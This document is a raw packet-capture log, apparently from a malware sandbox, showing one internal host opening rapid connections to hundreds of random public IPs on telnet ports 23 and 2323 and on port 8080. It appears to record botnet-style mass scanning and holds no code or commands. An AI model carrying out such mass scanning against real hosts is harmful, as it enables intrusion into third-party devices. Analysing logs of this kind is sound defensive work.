Feb 25, 2024 19:02:15.867352962 CET	58983	23	192.168.2.15	187.221.82.242
Feb 25, 2024 19:02:15.867362976 CET	58983	23	192.168.2.15	162.96.35.219
Feb 25, 2024 19:02:15.867362976 CET	58983	23	192.168.2.15	109.106.227.114
Feb 25, 2024 19:02:15.867367029 CET	58983	23	192.168.2.15	218.214.143.203
Feb 25, 2024 19:02:15.867378950 CET	58983	23	192.168.2.15	192.121.47.164
Feb 25, 2024 19:02:15.867383957 CET	58983	23	192.168.2.15	129.232.3.46
Feb 25, 2024 19:02:15.867392063 CET	58983	23	192.168.2.15	148.99.60.112
Feb 25, 2024 19:02:15.867403030 CET	58983	23	192.168.2.15	157.205.205.193
Feb 25, 2024 19:02:15.867409945 CET	58983	2323	192.168.2.15	144.6.225.117
Feb 25, 2024 19:02:15.867413998 CET	58983	23	192.168.2.15	89.194.189.143
Feb 25, 2024 19:02:15.867424011 CET	58983	23	192.168.2.15	62.254.120.66
Feb 25, 2024 19:02:15.867424011 CET	58983	23	192.168.2.15	20.116.14.178
Feb 25, 2024 19:02:15.867433071 CET	58983	23	192.168.2.15	43.239.47.94
Feb 25, 2024 19:02:15.867611885 CET	58983	23	192.168.2.15	70.85.239.97
Feb 25, 2024 19:02:15.867613077 CET	58983	23	192.168.2.15	32.88.29.33
Feb 25, 2024 19:02:15.867619038 CET	58983	23	192.168.2.15	80.32.7.164
Feb 25, 2024 19:02:15.867619038 CET	58983	23	192.168.2.15	51.165.171.187
Feb 25, 2024 19:02:15.867624998 CET	58983	23	192.168.2.15	40.118.76.204
Feb 25, 2024 19:02:15.867669106 CET	58983	23	192.168.2.15	72.139.118.255
Feb 25, 2024 19:02:15.867676973 CET	6758	8080	192.168.2.15	94.135.15.218
Feb 25, 2024 19:02:15.867680073 CET	58983	2323	192.168.2.15	129.126.20.238
Feb 25, 2024 19:02:15.867680073 CET	58983	23	192.168.2.15	201.62.54.137
Feb 25, 2024 19:02:15.867680073 CET	6758	8080	192.168.2.15	94.81.252.130
Feb 25, 2024 19:02:15.867681980 CET	58983	23	192.168.2.15	133.114.34.22
Feb 25, 2024 19:02:15.867685080 CET	6758	8080	192.168.2.15	62.97.14.152
Feb 25, 2024 19:02:15.867685080 CET	6758	8080	192.168.2.15	62.74.111.197
Feb 25, 2024 19:02:15.867685080 CET	58983	23	192.168.2.15	117.54.82.45
Feb 25, 2024 19:02:15.867685080 CET	6758	8080	192.168.2.15	94.254.6.65
Feb 25, 2024 19:02:15.867688894 CET	6758	8080	192.168.2.15	95.117.107.108
Feb 25, 2024 19:02:15.867688894 CET	6758	8080	192.168.2.15	31.177.53.106
Feb 25, 2024 19:02:15.867690086 CET	58983	23	192.168.2.15	201.15.220.88
Feb 25, 2024 19:02:15.867690086 CET	6758	8080	192.168.2.15	62.51.99.68
Feb 25, 2024 19:02:15.867691994 CET	58983	23	192.168.2.15	171.0.32.20
Feb 25, 2024 19:02:15.867690086 CET	6758	8080	192.168.2.15	85.134.27.141
Feb 25, 2024 19:02:15.867697001 CET	6758	8080	192.168.2.15	85.111.75.138
Feb 25, 2024 19:02:15.867697001 CET	58983	23	192.168.2.15	47.231.105.96
Feb 25, 2024 19:02:15.867697001 CET	6758	8080	192.168.2.15	95.217.240.34
Feb 25, 2024 19:02:15.867700100 CET	58983	23	192.168.2.15	191.110.12.41
Feb 25, 2024 19:02:15.867711067 CET	6758	8080	192.168.2.15	62.100.168.106
Feb 25, 2024 19:02:15.867712975 CET	58983	23	192.168.2.15	97.76.150.91
Feb 25, 2024 19:02:15.867712975 CET	6758	8080	192.168.2.15	85.228.94.77
Feb 25, 2024 19:02:15.867713928 CET	58983	23	192.168.2.15	220.219.136.193
Feb 25, 2024 19:02:15.867716074 CET	58983	23	192.168.2.15	61.115.81.57
Feb 25, 2024 19:02:15.867713928 CET	58983	23	192.168.2.15	47.63.27.102
Feb 25, 2024 19:02:15.867717028 CET	58983	2323	192.168.2.15	220.162.118.244
Feb 25, 2024 19:02:15.867717028 CET	6758	8080	192.168.2.15	31.95.78.11
Feb 25, 2024 19:02:15.867713928 CET	6758	8080	192.168.2.15	31.33.254.114
Feb 25, 2024 19:02:15.867713928 CET	58983	23	192.168.2.15	218.136.182.173
Feb 25, 2024 19:02:15.867721081 CET	58983	23	192.168.2.15	116.114.129.107
Feb 25, 2024 19:02:15.867722034 CET	6758	8080	192.168.2.15	31.6.162.169
Feb 25, 2024 19:02:15.867722034 CET	58983	23	192.168.2.15	140.140.140.4
Feb 25, 2024 19:02:15.867722034 CET	6758	8080	192.168.2.15	94.12.171.83
Feb 25, 2024 19:02:15.867721081 CET	6758	8080	192.168.2.15	31.236.13.234
Feb 25, 2024 19:02:15.867729902 CET	6758	8080	192.168.2.15	85.64.137.41
Feb 25, 2024 19:02:15.867721081 CET	6758	8080	192.168.2.15	94.254.58.69
Feb 25, 2024 19:02:15.867733002 CET	58983	23	192.168.2.15	91.20.169.216
Feb 25, 2024 19:02:15.867733002 CET	58983	23	192.168.2.15	109.151.104.99
Feb 25, 2024 19:02:15.867733955 CET	58983	2323	192.168.2.15	43.103.76.45
Feb 25, 2024 19:02:15.867733955 CET	58983	23	192.168.2.15	40.149.102.93
Feb 25, 2024 19:02:15.867743969 CET	6758	8080	192.168.2.15	62.129.187.62
Feb 25, 2024 19:02:15.867744923 CET	58983	23	192.168.2.15	122.251.32.114
Feb 25, 2024 19:02:15.867744923 CET	6758	8080	192.168.2.15	94.194.55.179
Feb 25, 2024 19:02:15.867748976 CET	6758	8080	192.168.2.15	31.14.227.211
Feb 25, 2024 19:02:15.867748976 CET	6758	8080	192.168.2.15	95.167.146.131
Feb 25, 2024 19:02:15.867749929 CET	58983	23	192.168.2.15	148.168.129.216
Feb 25, 2024 19:02:15.867778063 CET	6758	8080	192.168.2.15	95.250.186.159
Feb 25, 2024 19:02:15.867778063 CET	6758	8080	192.168.2.15	95.41.74.234
Feb 25, 2024 19:02:15.867778063 CET	58983	23	192.168.2.15	116.155.99.116
Feb 25, 2024 19:02:15.867788076 CET	58983	23	192.168.2.15	122.42.133.236
Feb 25, 2024 19:02:15.867790937 CET	58983	23	192.168.2.15	53.176.151.196
Feb 25, 2024 19:02:15.867791891 CET	6758	8080	192.168.2.15	85.226.66.156
Feb 25, 2024 19:02:15.867793083 CET	6758	8080	192.168.2.15	94.154.231.73
Feb 25, 2024 19:02:15.867793083 CET	6758	8080	192.168.2.15	94.11.184.136
Feb 25, 2024 19:02:15.867793083 CET	6758	8080	192.168.2.15	31.237.9.35
Feb 25, 2024 19:02:15.867794037 CET	58983	23	192.168.2.15	52.77.39.192
Feb 25, 2024 19:02:15.867794037 CET	6758	8080	192.168.2.15	85.226.186.252
Feb 25, 2024 19:02:15.867801905 CET	58983	23	192.168.2.15	174.228.132.44
Feb 25, 2024 19:02:15.867806911 CET	58983	23	192.168.2.15	162.222.247.148
Feb 25, 2024 19:02:15.867826939 CET	58983	23	192.168.2.15	181.227.47.187
Feb 25, 2024 19:02:15.867827892 CET	6758	8080	192.168.2.15	62.36.33.73
Feb 25, 2024 19:02:15.867830992 CET	58983	23	192.168.2.15	179.246.221.186
Feb 25, 2024 19:02:15.867830992 CET	6758	8080	192.168.2.15	94.253.184.74
Feb 25, 2024 19:02:15.867830992 CET	6758	8080	192.168.2.15	62.161.165.247
Feb 25, 2024 19:02:15.867842913 CET	6758	8080	192.168.2.15	31.244.74.119
Feb 25, 2024 19:02:15.867844105 CET	6758	8080	192.168.2.15	85.171.125.225
Feb 25, 2024 19:02:15.867844105 CET	58983	2323	192.168.2.15	216.211.199.225
Feb 25, 2024 19:02:15.867850065 CET	58983	23	192.168.2.15	34.162.113.141
Feb 25, 2024 19:02:15.867863894 CET	58983	23	192.168.2.15	48.17.115.48
Feb 25, 2024 19:02:15.867881060 CET	6758	8080	192.168.2.15	31.180.80.82
Feb 25, 2024 19:02:15.867881060 CET	6758	8080	192.168.2.15	94.116.242.59
Feb 25, 2024 19:02:15.867881060 CET	6758	8080	192.168.2.15	85.103.194.131
Feb 25, 2024 19:02:15.867881060 CET	6758	8080	192.168.2.15	94.129.82.212
Feb 25, 2024 19:02:15.867886066 CET	6758	8080	192.168.2.15	62.107.186.109
Feb 25, 2024 19:02:15.867909908 CET	58983	23	192.168.2.15	18.111.116.71
Feb 25, 2024 19:02:15.867913008 CET	6758	8080	192.168.2.15	85.62.153.184
Feb 25, 2024 19:02:15.867913961 CET	58983	23	192.168.2.15	104.167.166.170
Feb 25, 2024 19:02:15.867913008 CET	6758	8080	192.168.2.15	31.72.254.9
Feb 25, 2024 19:02:15.867921114 CET	58983	23	192.168.2.15	27.66.19.172
Feb 25, 2024 19:02:15.867921114 CET	58983	23	192.168.2.15	12.22.140.2
Feb 25, 2024 19:02:15.867938995 CET	58983	23	192.168.2.15	82.86.48.1
Feb 25, 2024 19:02:15.867938995 CET	58983	23	192.168.2.15	162.41.181.218
Feb 25, 2024 19:02:15.867949009 CET	58983	23	192.168.2.15	130.218.139.161
Feb 25, 2024 19:02:15.867958069 CET	6758	8080	192.168.2.15	95.87.7.160
Feb 25, 2024 19:02:15.867958069 CET	58983	23	192.168.2.15	60.51.144.212
Feb 25, 2024 19:02:15.867965937 CET	58983	2323	192.168.2.15	37.234.128.71
Feb 25, 2024 19:02:15.867976904 CET	6758	8080	192.168.2.15	95.237.239.19
Feb 25, 2024 19:02:15.867979050 CET	6758	8080	192.168.2.15	95.17.253.207
Feb 25, 2024 19:02:15.867979050 CET	58983	23	192.168.2.15	187.143.89.213
Feb 25, 2024 19:02:15.867979050 CET	6758	8080	192.168.2.15	95.125.168.148
Feb 25, 2024 19:02:15.867979050 CET	58983	23	192.168.2.15	13.16.39.64
Feb 25, 2024 19:02:15.867980957 CET	6758	8080	192.168.2.15	94.160.1.10
Feb 25, 2024 19:02:15.867984056 CET	58983	23	192.168.2.15	50.65.34.59
Feb 25, 2024 19:02:15.867984056 CET	58983	23	192.168.2.15	176.49.113.243
Feb 25, 2024 19:02:15.867990017 CET	58983	23	192.168.2.15	199.181.192.244
Feb 25, 2024 19:02:15.867991924 CET	6758	8080	192.168.2.15	95.62.133.186
Feb 25, 2024 19:02:15.868002892 CET	58983	23	192.168.2.15	65.162.201.158
Feb 25, 2024 19:02:15.868002892 CET	6758	8080	192.168.2.15	31.226.48.29
Feb 25, 2024 19:02:15.868012905 CET	6758	8080	192.168.2.15	85.251.173.61
Feb 25, 2024 19:02:15.868020058 CET	6758	8080	192.168.2.15	95.0.52.128
Feb 25, 2024 19:02:15.868020058 CET	58983	2323	192.168.2.15	180.76.164.230
Feb 25, 2024 19:02:15.868025064 CET	6758	8080	192.168.2.15	95.38.245.74
Feb 25, 2024 19:02:15.868025064 CET	58983	23	192.168.2.15	89.108.179.221
Feb 25, 2024 19:02:15.868025064 CET	58983	23	192.168.2.15	48.13.146.210
Feb 25, 2024 19:02:15.868029118 CET	58983	23	192.168.2.15	65.115.39.66
Feb 25, 2024 19:02:15.868030071 CET	6758	8080	192.168.2.15	31.44.157.241
Feb 25, 2024 19:02:15.868029118 CET	6758	8080	192.168.2.15	31.225.133.197
Feb 25, 2024 19:02:15.868029118 CET	58983	23	192.168.2.15	45.181.93.235
Feb 25, 2024 19:02:15.868029118 CET	6758	8080	192.168.2.15	85.181.21.49
Feb 25, 2024 19:02:15.868033886 CET	58983	23	192.168.2.15	23.103.13.6
Feb 25, 2024 19:02:15.868047953 CET	6758	8080	192.168.2.15	94.12.62.21
Feb 25, 2024 19:02:15.868052006 CET	6758	8080	192.168.2.15	62.132.91.246
Feb 25, 2024 19:02:15.868050098 CET	6758	8080	192.168.2.15	85.106.119.136
Feb 25, 2024 19:02:15.868057966 CET	58983	23	192.168.2.15	203.105.220.210
Feb 25, 2024 19:02:15.868057966 CET	58983	23	192.168.2.15	13.135.24.48
Feb 25, 2024 19:02:15.868066072 CET	6758	8080	192.168.2.15	95.27.232.53
Feb 25, 2024 19:02:15.868066072 CET	6758	8080	192.168.2.15	95.23.6.17
Feb 25, 2024 19:02:15.868069887 CET	6758	8080	192.168.2.15	95.178.221.65
Feb 25, 2024 19:02:15.868074894 CET	6758	8080	192.168.2.15	94.188.121.91
Feb 25, 2024 19:02:15.868074894 CET	58983	23	192.168.2.15	170.54.219.239
Feb 25, 2024 19:02:15.868074894 CET	58983	23	192.168.2.15	70.227.26.135
Feb 25, 2024 19:02:15.868081093 CET	6758	8080	192.168.2.15	85.133.76.218
Feb 25, 2024 19:02:15.868083954 CET	58983	23	192.168.2.15	42.175.31.43
Feb 25, 2024 19:02:15.868083954 CET	58983	23	192.168.2.15	129.113.234.132
Feb 25, 2024 19:02:15.868083954 CET	6758	8080	192.168.2.15	85.225.169.95
Feb 25, 2024 19:02:15.868083954 CET	58983	23	192.168.2.15	59.161.222.253
Feb 25, 2024 19:02:15.868083954 CET	6758	8080	192.168.2.15	95.220.171.232
Feb 25, 2024 19:02:15.868088007 CET	58983	23	192.168.2.15	216.169.192.69
Feb 25, 2024 19:02:15.868088007 CET	58983	23	192.168.2.15	184.154.133.167
Feb 25, 2024 19:02:15.868088007 CET	58983	23	192.168.2.15	113.157.114.219
Feb 25, 2024 19:02:15.868094921 CET	58983	2323	192.168.2.15	46.188.63.45
Feb 25, 2024 19:02:15.868094921 CET	6758	8080	192.168.2.15	62.101.123.89
Feb 25, 2024 19:02:15.868094921 CET	6758	8080	192.168.2.15	95.75.208.248
Feb 25, 2024 19:02:15.868094921 CET	6758	8080	192.168.2.15	95.193.186.11
Feb 25, 2024 19:02:15.868094921 CET	58983	23	192.168.2.15	204.227.124.206
Feb 25, 2024 19:02:15.868103027 CET	6758	8080	192.168.2.15	31.180.15.126
Feb 25, 2024 19:02:15.868108988 CET	58983	23	192.168.2.15	42.132.176.59
Feb 25, 2024 19:02:15.868108988 CET	58983	23	192.168.2.15	180.25.85.215
Feb 25, 2024 19:02:15.868117094 CET	58983	23	192.168.2.15	179.27.213.221
Feb 25, 2024 19:02:15.868117094 CET	58983	23	192.168.2.15	34.27.84.24
Feb 25, 2024 19:02:15.868118048 CET	6758	8080	192.168.2.15	31.121.111.42
Feb 25, 2024 19:02:15.868118048 CET	6758	8080	192.168.2.15	94.68.246.236
Feb 25, 2024 19:02:15.868118048 CET	6758	8080	192.168.2.15	31.139.227.152
Feb 25, 2024 19:02:15.868124008 CET	58983	2323	192.168.2.15	153.207.168.161
Feb 25, 2024 19:02:15.868123055 CET	58983	23	192.168.2.15	188.250.224.148
Feb 25, 2024 19:02:15.868124008 CET	6758	8080	192.168.2.15	95.219.171.197
Feb 25, 2024 19:02:15.868124008 CET	58983	23	192.168.2.15	178.179.211.238
Feb 25, 2024 19:02:15.868124008 CET	58983	23	192.168.2.15	62.232.202.82
Feb 25, 2024 19:02:15.868123055 CET	58983	23	192.168.2.15	91.130.100.240
Feb 25, 2024 19:02:15.868123055 CET	6758	8080	192.168.2.15	85.78.5.209
Feb 25, 2024 19:02:15.868124008 CET	58983	23	192.168.2.15	213.225.51.128
Feb 25, 2024 19:02:15.868128061 CET	6758	8080	192.168.2.15	95.102.32.228
Feb 25, 2024 19:02:15.868128061 CET	58983	23	192.168.2.15	151.240.89.124
Feb 25, 2024 19:02:15.868136883 CET	6758	8080	192.168.2.15	85.193.114.38
Feb 25, 2024 19:02:15.868139982 CET	58983	23	192.168.2.15	109.199.135.227
Feb 25, 2024 19:02:15.868139982 CET	58983	23	192.168.2.15	95.103.205.175
Feb 25, 2024 19:02:15.868139982 CET	6758	8080	192.168.2.15	85.221.161.207
Feb 25, 2024 19:02:15.868139982 CET	6758	8080	192.168.2.15	62.98.192.228
Feb 25, 2024 19:02:15.868139982 CET	58983	23	192.168.2.15	96.233.105.94
Feb 25, 2024 19:02:15.868139982 CET	58983	23	192.168.2.15	25.138.72.241
Feb 25, 2024 19:02:15.868139982 CET	6758	8080	192.168.2.15	31.58.147.128
Feb 25, 2024 19:02:15.868143082 CET	6758	8080	192.168.2.15	85.32.82.79
Feb 25, 2024 19:02:15.868144035 CET	58983	23	192.168.2.15	57.225.144.6
Feb 25, 2024 19:02:15.868143082 CET	6758	8080	192.168.2.15	94.144.148.182
Feb 25, 2024 19:02:15.868144035 CET	6758	8080	192.168.2.15	31.236.146.244
Feb 25, 2024 19:02:15.868143082 CET	58983	23	192.168.2.15	217.243.139.193
Feb 25, 2024 19:02:15.868144035 CET	58983	23	192.168.2.15	179.170.11.246
Feb 25, 2024 19:02:15.868149042 CET	58983	2323	192.168.2.15	209.183.164.112
Feb 25, 2024 19:02:15.868149996 CET	58983	23	192.168.2.15	107.82.148.237
Feb 25, 2024 19:02:15.868164062 CET	6758	8080	192.168.2.15	31.65.153.159
Feb 25, 2024 19:02:15.868164062 CET	6758	8080	192.168.2.15	94.88.171.180
Feb 25, 2024 19:02:15.868174076 CET	6758	8080	192.168.2.15	31.174.126.189
Feb 25, 2024 19:02:15.868174076 CET	6758	8080	192.168.2.15	62.112.74.100
Feb 25, 2024 19:02:15.868180990 CET	58983	23	192.168.2.15	142.100.28.49
Feb 25, 2024 19:02:15.868181944 CET	6758	8080	192.168.2.15	62.203.66.217
Feb 25, 2024 19:02:15.868187904 CET	6758	8080	192.168.2.15	85.184.249.10
Feb 25, 2024 19:02:15.868201017 CET	58983	23	192.168.2.15	25.184.137.62
Feb 25, 2024 19:02:15.868204117 CET	58983	23	192.168.2.15	177.128.1.93
Feb 25, 2024 19:02:15.868215084 CET	58983	23	192.168.2.15	141.135.210.143
Feb 25, 2024 19:02:15.868225098 CET	6758	8080	192.168.2.15	31.53.17.201
Feb 25, 2024 19:02:15.868225098 CET	6758	8080	192.168.2.15	31.99.221.184
Feb 25, 2024 19:02:15.868237972 CET	6758	8080	192.168.2.15	62.242.138.209
Feb 25, 2024 19:02:15.868240118 CET	58983	2323	192.168.2.15	62.4.169.13
Feb 25, 2024 19:02:15.868240118 CET	6758	8080	192.168.2.15	31.249.44.196
Feb 25, 2024 19:02:15.868240118 CET	6758	8080	192.168.2.15	62.124.120.85
Feb 25, 2024 19:02:15.868240118 CET	6758	8080	192.168.2.15	62.251.242.78
Feb 25, 2024 19:02:15.868244886 CET	6758	8080	192.168.2.15	62.137.117.105
Feb 25, 2024 19:02:15.868244886 CET	58983	23	192.168.2.15	180.29.15.103
Feb 25, 2024 19:02:15.868244886 CET	6758	8080	192.168.2.15	31.147.136.167
Feb 25, 2024 19:02:15.868256092 CET	58983	23	192.168.2.15	142.183.64.115
Feb 25, 2024 19:02:15.868257046 CET	58983	23	192.168.2.15	12.198.113.192
Feb 25, 2024 19:02:15.868267059 CET	6758	8080	192.168.2.15	85.145.143.242
Feb 25, 2024 19:02:15.868269920 CET	6758	8080	192.168.2.15	94.16.145.139
Feb 25, 2024 19:02:15.868280888 CET	58983	23	192.168.2.15	102.145.192.93
Feb 25, 2024 19:02:15.868285894 CET	6758	8080	192.168.2.15	94.57.157.213
Feb 25, 2024 19:02:15.868285894 CET	58983	23	192.168.2.15	90.233.94.192
Feb 25, 2024 19:02:15.868285894 CET	58983	23	192.168.2.15	38.185.162.244
Feb 25, 2024 19:02:15.868289948 CET	6758	8080	192.168.2.15	94.77.3.6
Feb 25, 2024 19:02:15.868293047 CET	58983	23	192.168.2.15	191.26.198.137
Feb 25, 2024 19:02:15.868297100 CET	6758	8080	192.168.2.15	62.233.178.167
Feb 25, 2024 19:02:15.868297100 CET	6758	8080	192.168.2.15	95.161.220.179
Feb 25, 2024 19:02:15.868297100 CET	58983	23	192.168.2.15	4.11.87.6
Feb 25, 2024 19:02:15.868303061 CET	58983	23	192.168.2.15	54.39.222.182
Feb 25, 2024 19:02:15.868308067 CET	6758	8080	192.168.2.15	62.55.33.253
Feb 25, 2024 19:02:15.868308067 CET	6758	8080	192.168.2.15	62.117.46.8
Feb 25, 2024 19:02:15.868324041 CET	6758	8080	192.168.2.15	31.147.230.90
Feb 25, 2024 19:02:15.868335009 CET	58983	2323	192.168.2.15	42.13.21.183
Feb 25, 2024 19:02:15.868341923 CET	6758	8080	192.168.2.15	62.67.21.65
Feb 25, 2024 19:02:15.868346930 CET	58983	23	192.168.2.15	117.60.204.160
Feb 25, 2024 19:02:15.868346930 CET	6758	8080	192.168.2.15	85.13.52.251
Feb 25, 2024 19:02:15.868355036 CET	58983	23	192.168.2.15	138.93.98.151
Feb 25, 2024 19:02:15.868360996 CET	6758	8080	192.168.2.15	95.24.247.83
Feb 25, 2024 19:02:15.868360996 CET	6758	8080	192.168.2.15	95.127.199.149
Feb 25, 2024 19:02:15.868366957 CET	6758	8080	192.168.2.15	62.232.252.109
Feb 25, 2024 19:02:15.868367910 CET	6758	8080	192.168.2.15	85.88.124.140
Feb 25, 2024 19:02:15.868367910 CET	6758	8080	192.168.2.15	62.53.122.117
Feb 25, 2024 19:02:15.868366957 CET	6758	8080	192.168.2.15	94.177.32.253
Feb 25, 2024 19:02:15.868369102 CET	58983	23	192.168.2.15	103.131.228.211
Feb 25, 2024 19:02:15.868374109 CET	58983	23	192.168.2.15	128.63.157.150
Feb 25, 2024 19:02:15.868381977 CET	58983	23	192.168.2.15	180.149.20.122
Feb 25, 2024 19:02:15.868381977 CET	6758	8080	192.168.2.15	94.182.94.35
Feb 25, 2024 19:02:15.868395090 CET	58983	23	192.168.2.15	173.118.191.94
Feb 25, 2024 19:02:15.868402958 CET	58983	23	192.168.2.15	126.221.21.199
Feb 25, 2024 19:02:15.868402958 CET	6758	8080	192.168.2.15	31.3.116.159
Feb 25, 2024 19:02:15.868415117 CET	58983	23	192.168.2.15	35.128.97.211
Feb 25, 2024 19:02:15.868416071 CET	6758	8080	192.168.2.15	31.136.51.43
Feb 25, 2024 19:02:15.868417978 CET	6758	8080	192.168.2.15	85.119.18.44
Feb 25, 2024 19:02:15.868416071 CET	58983	23	192.168.2.15	163.250.83.188
Feb 25, 2024 19:02:15.868426085 CET	58983	2323	192.168.2.15	12.31.34.104
Feb 25, 2024 19:02:15.868439913 CET	58983	23	192.168.2.15	113.136.60.238
Feb 25, 2024 19:02:15.868451118 CET	58983	23	192.168.2.15	210.188.63.171
Feb 25, 2024 19:02:15.868451118 CET	58983	23	192.168.2.15	109.90.97.74
Feb 25, 2024 19:02:15.868454933 CET	58983	23	192.168.2.15	161.206.222.205
Feb 25, 2024 19:02:15.868454933 CET	58983	23	192.168.2.15	37.24.77.198
Feb 25, 2024 19:02:15.868467093 CET	58983	23	192.168.2.15	140.218.146.105
Feb 25, 2024 19:02:15.868467093 CET	6758	8080	192.168.2.15	31.150.106.147
Feb 25, 2024 19:02:15.868472099 CET	58983	23	192.168.2.15	158.178.231.8
Feb 25, 2024 19:02:15.868472099 CET	58983	23	192.168.2.15	100.135.213.241
Feb 25, 2024 19:02:15.868472099 CET	6758	8080	192.168.2.15	94.77.224.231
Feb 25, 2024 19:02:15.868484974 CET	58983	23	192.168.2.15	24.129.218.204
Feb 25, 2024 19:02:15.868490934 CET	6758	8080	192.168.2.15	85.221.73.84
Feb 25, 2024 19:02:15.868496895 CET	58983	2323	192.168.2.15	134.151.182.199
Feb 25, 2024 19:02:15.868498087 CET	58983	23	192.168.2.15	74.57.138.156
Feb 25, 2024 19:02:15.868501902 CET	58983	23	192.168.2.15	101.23.134.77
Feb 25, 2024 19:02:15.868505955 CET	58983	23	192.168.2.15	153.245.104.222
Feb 25, 2024 19:02:15.868511915 CET	58983	23	192.168.2.15	119.76.41.96
Feb 25, 2024 19:02:15.868511915 CET	58983	23	192.168.2.15	60.79.165.29
Feb 25, 2024 19:02:15.868524075 CET	6758	8080	192.168.2.15	62.241.41.159
Feb 25, 2024 19:02:15.868526936 CET	58983	23	192.168.2.15	220.116.210.44
Feb 25, 2024 19:02:15.868525028 CET	6758	8080	192.168.2.15	62.197.33.159
Feb 25, 2024 19:02:15.868525028 CET	58983	23	192.168.2.15	51.210.166.23
Feb 25, 2024 19:02:15.868525028 CET	6758	8080	192.168.2.15	95.122.63.255
Feb 25, 2024 19:02:15.868535042 CET	6758	8080	192.168.2.15	31.107.92.149
Feb 25, 2024 19:02:15.868535042 CET	58983	23	192.168.2.15	45.34.80.140
Feb 25, 2024 19:02:15.868535042 CET	58983	23	192.168.2.15	78.242.225.248
Feb 25, 2024 19:02:15.868547916 CET	6758	8080	192.168.2.15	85.35.136.57
Feb 25, 2024 19:02:15.868551970 CET	6758	8080	192.168.2.15	31.130.199.208
Feb 25, 2024 19:02:15.868556023 CET	6758	8080	192.168.2.15	62.149.234.132
Feb 25, 2024 19:02:15.868565083 CET	6758	8080	192.168.2.15	31.97.79.93
Feb 25, 2024 19:02:15.868566990 CET	6758	8080	192.168.2.15	85.172.2.82
Feb 25, 2024 19:02:15.868571997 CET	6758	8080	192.168.2.15	94.237.60.188
Feb 25, 2024 19:02:15.868577003 CET	6758	8080	192.168.2.15	62.60.224.39
Feb 25, 2024 19:02:15.868593931 CET	6758	8080	192.168.2.15	85.22.226.136
Feb 25, 2024 19:02:15.868594885 CET	58983	23	192.168.2.15	68.136.175.220
Feb 25, 2024 19:02:15.868593931 CET	58983	23	192.168.2.15	69.96.37.60
Feb 25, 2024 19:02:15.868596077 CET	58983	23	192.168.2.15	58.40.41.115
Feb 25, 2024 19:02:15.868593931 CET	58983	23	192.168.2.15	203.76.140.209
Feb 25, 2024 19:02:15.868597984 CET	58983	2323	192.168.2.15	88.63.225.28
Feb 25, 2024 19:02:15.868613958 CET	58983	23	192.168.2.15	87.161.161.144
Feb 25, 2024 19:02:15.868614912 CET	58983	23	192.168.2.15	93.180.156.62
Feb 25, 2024 19:02:15.868624926 CET	58983	23	192.168.2.15	219.214.76.125
Feb 25, 2024 19:02:15.868630886 CET	6758	8080	192.168.2.15	95.29.105.192
Feb 25, 2024 19:02:15.868630886 CET	58983	23	192.168.2.15	113.46.17.101
Feb 25, 2024 19:02:15.868638992 CET	58983	23	192.168.2.15	223.6.252.30
Feb 25, 2024 19:02:15.868638992 CET	6758	8080	192.168.2.15	94.66.115.208
Feb 25, 2024 19:02:15.868644953 CET	58983	2323	192.168.2.15	5.255.155.228
Feb 25, 2024 19:02:15.868657112 CET	6758	8080	192.168.2.15	94.214.131.167
Feb 25, 2024 19:02:15.868657112 CET	6758	8080	192.168.2.15	95.218.133.229
Feb 25, 2024 19:02:15.868665934 CET	6758	8080	192.168.2.15	85.147.166.59
Feb 25, 2024 19:02:15.868673086 CET	58983	23	192.168.2.15	77.8.200.222
Feb 25, 2024 19:02:15.868673086 CET	58983	23	192.168.2.15	24.188.24.27
Feb 25, 2024 19:02:15.868674994 CET	58983	23	192.168.2.15	38.187.103.229
Feb 25, 2024 19:02:15.868680000 CET	58983	23	192.168.2.15	119.238.136.125
Feb 25, 2024 19:02:15.868680000 CET	58983	23	192.168.2.15	110.237.101.151
Feb 25, 2024 19:02:15.868686914 CET	58983	23	192.168.2.15	117.247.91.139
Feb 25, 2024 19:02:15.868688107 CET	58983	23	192.168.2.15	203.253.158.220
Feb 25, 2024 19:02:15.868693113 CET	58983	23	192.168.2.15	217.209.242.68
Feb 25, 2024 19:02:15.868693113 CET	58983	23	192.168.2.15	183.56.226.126
Feb 25, 2024 19:02:15.868696928 CET	58983	2323	192.168.2.15	79.157.128.188
Feb 25, 2024 19:02:15.868697882 CET	58983	23	192.168.2.15	48.105.150.176
Feb 25, 2024 19:02:15.868716955 CET	58983	23	192.168.2.15	31.75.154.104
Feb 25, 2024 19:02:15.868721008 CET	58983	23	192.168.2.15	194.205.201.44
Feb 25, 2024 19:02:15.868722916 CET	58983	23	192.168.2.15	111.23.153.174
Feb 25, 2024 19:02:15.868736029 CET	58983	23	192.168.2.15	171.159.159.253
Feb 25, 2024 19:02:15.868736982 CET	6758	8080	192.168.2.15	85.149.157.178
Feb 25, 2024 19:02:15.868738890 CET	6758	8080	192.168.2.15	94.235.104.71
Feb 25, 2024 19:02:15.868740082 CET	58983	23	192.168.2.15	113.142.52.45
Feb 25, 2024 19:02:15.868740082 CET	6758	8080	192.168.2.15	85.178.143.192
Feb 25, 2024 19:02:15.868743896 CET	58983	23	192.168.2.15	126.137.2.85
Feb 25, 2024 19:02:15.868743896 CET	6758	8080	192.168.2.15	94.155.231.207
Feb 25, 2024 19:02:15.868743896 CET	6758	8080	192.168.2.15	85.148.213.37
Feb 25, 2024 19:02:15.868746042 CET	6758	8080	192.168.2.15	85.6.55.249
Feb 25, 2024 19:02:15.868747950 CET	6758	8080	192.168.2.15	62.250.100.243
Feb 25, 2024 19:02:15.868746042 CET	6758	8080	192.168.2.15	62.93.129.235
Feb 25, 2024 19:02:15.868747950 CET	6758	8080	192.168.2.15	95.9.47.213
Feb 25, 2024 19:02:15.868746042 CET	58983	23	192.168.2.15	129.175.153.178
Feb 25, 2024 19:02:15.868758917 CET	6758	8080	192.168.2.15	94.83.61.90
Feb 25, 2024 19:02:15.868762970 CET	58983	2323	192.168.2.15	35.66.114.251
Feb 25, 2024 19:02:15.868762970 CET	58983	23	192.168.2.15	97.102.37.18
Feb 25, 2024 19:02:15.868769884 CET	6758	8080	192.168.2.15	95.255.72.34
Feb 25, 2024 19:02:15.868777037 CET	58983	23	192.168.2.15	170.198.0.34
Feb 25, 2024 19:02:15.868777037 CET	6758	8080	192.168.2.15	94.48.39.163
Feb 25, 2024 19:02:15.868777037 CET	58983	23	192.168.2.15	155.1.28.78
Feb 25, 2024 19:02:15.868777990 CET	58983	23	192.168.2.15	197.251.135.191
Feb 25, 2024 19:02:15.868777990 CET	6758	8080	192.168.2.15	95.129.3.233
Feb 25, 2024 19:02:15.868777990 CET	58983	23	192.168.2.15	38.143.145.86
Feb 25, 2024 19:02:15.868788958 CET	6758	8080	192.168.2.15	31.111.20.28
Feb 25, 2024 19:02:15.868788958 CET	6758	8080	192.168.2.15	31.30.144.103
